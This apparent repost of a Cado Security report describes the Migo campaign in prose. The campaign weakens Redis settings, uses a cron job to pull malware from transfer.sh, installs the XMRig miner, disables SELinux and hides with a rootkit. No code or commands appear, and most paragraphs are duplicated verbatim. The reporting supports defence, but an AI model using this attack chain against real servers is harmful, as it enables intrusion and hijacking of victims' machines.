Experts from Cado Security have identified a new malicious campaign targeting Redis servers. After gaining initial access to the systems, the attackers mine cryptocurrency on compromised hosts running Linux.
According to Matt Muir, one of the researchers, this campaign uses a number of fundamentally new methods to weaken server protection. In particular, configuration options such as protected-mode, replica-read-only, aof-rewrite-incremental-fsync, and rdb-save-incremental-fsync are disabled. This strategy allows hackers to send additional commands to the server from external networks, and also facilitates subsequent exploitation of vulnerabilities without attracting unnecessary attention.
After disabling the security mechanisms, attackers install two special keys in the system. The first key contains a link to download the Migo malware.
The second key starts a Cron task that periodically connects to the service. Transfer.sh and downloads updated versions of Migo from there. This service allows you to share files anonymously and for free, and it was already used by attackers in similar attacks in early 2023.
This allows attackers to regularly upload new versions of malware or other tools to the compromised server at their own discretion.
The Migo code implements various obfuscation methods that make it difficult to reverse engineer and analyze the program.
The main functionality of Migo is to download and launch the XMRig miner. In addition, the program performs a number of other important tasks: it ensures that it is fixed in the system and runs on a schedule, blocks competing mining software, and initiates the mining process itself on an infected device.
The tool also disables the SELinux subsystem in Linux, which is responsible for advanced security mechanisms. Without SELinux, Migo can operate seamlessly.
Migo searches for and deletes scripts for uninstalling system monitoring software agents. Such agents are often deployed by cloud hosting providers to protect their infrastructure.
To mask running processes and traces in files, Migo uses a modified version of the popular Linux rootkit libprocesshider. Rootkits allow you to hide the presence of malware from standard detection tools.
As Muir notes, the Migo program's tactics largely overlap with the methods used by other well-known hacker groups, such as TeamTNT, WatchDog, and Rocke.
Cado Security analysts note that attackers are constantly creating and improving malicious tools to attack popular web platforms and services.
Cado Security recommends that administrators of Redis servers and other common web applications exercise increased vigilance in light of such cyber threats and monitor security updates.
• Source: https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/
According to Matt Muir, one of the researchers, this campaign uses a number of fundamentally new methods to weaken server protection. In particular, configuration options such as protected-mode, replica-read-only, aof-rewrite-incremental-fsync, and rdb-save-incremental-fsync are disabled. This strategy allows hackers to send additional commands to the server from external networks, and also facilitates subsequent exploitation of vulnerabilities without attracting unnecessary attention.
After disabling the security mechanisms, attackers install two special keys in the system. The first key contains a link to download the Migo malware.
The second key starts a Cron task that periodically connects to the service. Transfer.sh and downloads updated versions of Migo from there. This service allows you to share files anonymously and for free, and it was already used by attackers in similar attacks in early 2023.
This allows attackers to regularly upload new versions of malware or other tools to the compromised server at their own discretion.
The Migo code implements various obfuscation methods that make it difficult to reverse engineer and analyze the program.
The main functionality of Migo is to download and launch the XMRig miner. In addition, the program performs a number of other important tasks: it ensures that it is fixed in the system and runs on a schedule, blocks competing mining software, and initiates the mining process itself on an infected device.
The tool also disables the SELinux subsystem in Linux, which is responsible for advanced security mechanisms. Without SELinux, Migo can operate seamlessly.
Migo searches for and deletes scripts for uninstalling system monitoring software agents. Such agents are often deployed by cloud hosting providers to protect their infrastructure.
To mask running processes and traces in files, Migo uses a modified version of the popular Linux rootkit libprocesshider. Rootkits allow you to hide the presence of malware from standard detection tools.
As Muir notes, the Migo program's tactics largely overlap with the methods used by other well-known hacker groups, such as TeamTNT, WatchDog, and Rocke.
Cado Security analysts note that attackers are constantly creating and improving malicious tools to attack popular web platforms and services.
Cado Security recommends that administrators of Redis servers and other common web applications exercise increased vigilance in light of such cyber threats and monitor security updates.
• Source: https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/
